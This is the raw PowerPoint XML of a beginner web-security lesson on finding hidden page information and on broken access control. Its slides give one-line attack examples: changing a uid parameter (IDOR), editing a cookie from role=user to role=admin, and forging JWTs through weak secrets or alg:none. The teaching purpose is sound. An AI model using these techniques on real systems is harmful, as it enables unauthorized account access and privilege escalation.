              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9390" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="182F70"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>AGENDA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12936804" y="5438438"/>
            <a:ext cx="1138596" cy="1815153"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1138596" h="1815153">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1138597" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1138597" y="1815154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="18151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0" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4107993" y="4157170"/>
            <a:ext cx="1738661" cy="431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9"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499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01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8579"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499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02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8579"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499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03</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8579"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="7797ED"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>04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19658" y="-513834"/>
            <a:ext cx="8242267" cy="6689262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8242267" h="6689262">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8242266" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8242266" y="6689262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="668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3216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0" y="6175428"/>
            <a:ext cx="18288000" cy="4111572"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="24384000" cy="5482096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47000"/>
            </a:blip>
            <a:srcRect t="42496" b="42496"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="24384000" cy="5482096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817610" y="344931"/>
            <a:ext cx="9932511" cy="2917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02"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9666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HIDDEN INFORMATION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7610" y="3690024"/>
            <a:ext cx="9932511" cy="158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Developers sometimes leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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sensitive data</a:t>
            </a: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 places users don’t normally look.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc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Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/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Viewing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2237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Page Sources</a:t>
            </a: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lang="en-US" sz="2237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Response Headers</a:t>
            </a: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483077" lvl="1" indent="-241539" algn="l">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="22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Understanding the components of the Webpages.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66318" y="0"/>
            <a:ext cx="8321682" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1109557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47000"/>
            </a:blip>
            <a:srcRect l="23034" r="23034"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="11095577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4820869" y="4579128"/>
            <a:ext cx="6934262" cy="8237244"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6934262" h="8237244">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6934262" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6934262" y="8237244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8237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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="817610" y="633159"/>
            <a:ext cx="7836408" cy="212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29"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6999">
                <a:solidFill>
                  <a:srgbClr val="FFCA04"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>BROKEN ACCESS CONTROLS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9238" y="4343809"/>
            <a:ext cx="674908" cy="961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09"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6394">
                <a:solidFill>
                  <a:srgbClr val="ED7843"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>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9238" y="6309442"/>
            <a:ext cx="674908" cy="961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09"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6394">
                <a:solidFill>
                  <a:srgbClr val="ED7843"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>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9238" y="7969427"/>
            <a:ext cx="674908" cy="961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09"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6394">
                <a:solidFill>
                  <a:srgbClr val="ED7843"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/>
              </a:rPr>
              <a:t>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7610" y="2993944"/>
            <a:ext cx="6964860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290"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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Attackers exploit weak or missing restrictions to access data or actions they shouldn’t.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6968" y="4464424"/>
            <a:ext cx="4700708" cy="41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485"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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Indirect Object Referrence (IDOR)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66968" y="6395167"/>
            <a:ext cx="2696559" cy="41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485"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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Cookies Tampering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66968" y="8061934"/>
            <a:ext cx="4055753" cy="41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485"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="24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JWT Tampering and Cracking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66968" y="4949733"/>
            <a:ext cx="7706111" cy="107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898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Example: Change ?uid=1 to ?uid=2 → view another user’s profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Happens when the system trusts user input too much.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66968" y="6828793"/>
            <a:ext cx="7277032" cy="7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898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Example: Edit a cookie value like role=user → role=admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Shows why cookies should be signed/validated.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66968" y="8549027"/>
            <a:ext cx="7277032" cy="107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898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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If JWT uses weak secrets or alg:none, attackers can forge tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="439898" lvl="1" indent="-219949" algn="l">
              <a:lnSpc>
                <a:spcPts val="2913"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="203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Leads to account takeover or privilege escalation.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713</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>108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Lato Italics</vt:lpstr>
      <vt:lpstr>Lato Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Fira Code</vt:lpstr>
      <vt:lpstr>Paytone One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Geometric Abstract Introduction to HTML Tutorial</dc:title>
  <cp:lastModifiedBy>MUHAMMAD IFFAT BIN HANAFIAH</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-22T14:09:49Z</dcterms:modified>
  <dc:identifier>DAGwgjFv85U</dc:identifier>
</cp:coreProperties>
</file>